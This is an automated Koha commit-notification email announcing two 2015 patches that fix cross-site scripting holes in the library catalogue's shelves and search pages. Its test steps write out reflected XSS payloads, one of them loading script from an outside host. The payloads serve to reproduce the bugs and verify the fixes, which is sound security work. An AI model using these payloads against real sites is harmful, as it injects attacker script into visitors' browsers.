[koha-commits] main Koha release repository branch 3.14.x updated. v3.14.15-11-gb9ebf70

Git repo owner gitmaster at git.koha-community.org
Tue Jun 23 11:51:29 CEST 2015 

This is an automated email from the git hooks/post-receive script. It was
generated because a ref change was pushed to the repository containing
the project "main Koha release repository".

The branch, 3.14.x has been updated
       via  b9ebf70d9583d761d8db9eaf503ebe9498bc01e0 (commit)
       via  f62614fc091ba5b929189d12be10eae2643357d7 (commit)
      from  b5a0d0a72b2f7ee263184ec98a7ce1dd14b26315 (commit)

Those revisions listed above that are new to this repository have
not appeared on any other notification email; so we list those
revisions in full, below.

- Log -----------------------------------------------------------------
commit b9ebf70d9583d761d8db9eaf503ebe9498bc01e0
Author: Chris Cormack <chrisc at catalyst.net.nz>
Date:   Fri Jun 19 11:41:45 2015 +1200

    Bug 14418: More XSS vulnerabilities in opac-shelves.pl
    
    To test:
    1/ Hit a url like
    /cgi-bin/koha/opac-shelves.pl?viewshelf=7&op=modif&display="><script>alert('oh
    noes')</script>  Where the id is a valid shelf id
    2/ Notice the js is executed
    3/ Apply patch
    4/ Reload page
    5/ Notice input is now escaped on display
    
    Signed-off-by: Jonathan Druart <jonathan.druart at koha-community.org>
    Signed-off-by: Katrin Fischer <katrin.fischer at bsz-bw.de>
    Tested in Debian, couldn't reproduce the alert in Iceweasel, but in
    Chromium. Patch fixes it.
    Signed-off-by: Tomas Cohen Arazi <tomascohen at unc.edu.ar>
    
    (cherry picked from commit cd4c959f7226b060f683f5571f030cc2df7539ca)
    (cherry picked from commit f9569612b65798dce457b5650a5b5162b80b12e8)
    Signed-off-by: Fridolin Somers <fridolin.somers at biblibre.com>

commit f62614fc091ba5b929189d12be10eae2643357d7
Author: Chris Cormack <chrisc at catalyst.net.nz>
Date:   Fri Jun 19 09:25:22 2015 +1200

    Bug 14418: XSS Vulnerabilities in OPAC search
    
    Fix for /cgi-bin/koha/opac-search.pl
    
    To test
    
    1/ Hit /cgi-bin/koha/opac-search.pl?tag="><script
    src='http://cst.sba-research.org/x.js'/>&q=a
    2/ Notice the js is executed
    3/ Apply patch
    4/ Reload page, notice it is no longer executed
    5/ Test the rss links work still
    
    Signed-off-by: Jonathan Druart <jonathan.druart at koha-community.org>
    Signed-off-by: Katrin Fischer <katrin.fischer at bsz-bw.de>
    Confirmed bug and that the patch fixes it.
    Signed-off-by: Tomas Cohen Arazi <tomascohen at unc.edu.ar>
    
    (cherry picked from commit 45dd7754019e8f525c8d52bf33c41016e5ccbfab)
    Signed-off-by: Chris Cormack <chrisc at catalyst.net.nz>
    (cherry picked from commit 21cc992e7e5a35ccf1b7614cae638c9863e2a35f)
    Signed-off-by: Fridolin Somers <fridolin.somers at biblibre.com>
    
    Conflicts:
    	koha-tmpl/opac-tmpl/bootstrap/en/modules/opac-results.tt

-----------------------------------------------------------------------

Summary of changes:
 koha-tmpl/opac-tmpl/bootstrap/en/modules/opac-results.tt |    6 +++---
 koha-tmpl/opac-tmpl/bootstrap/en/modules/opac-shelves.tt |    2 +-
 2 files changed, 4 insertions(+), 4 deletions(-)


hooks/post-receive
-- 
main Koha release repository

More information about the koha-commits mailing list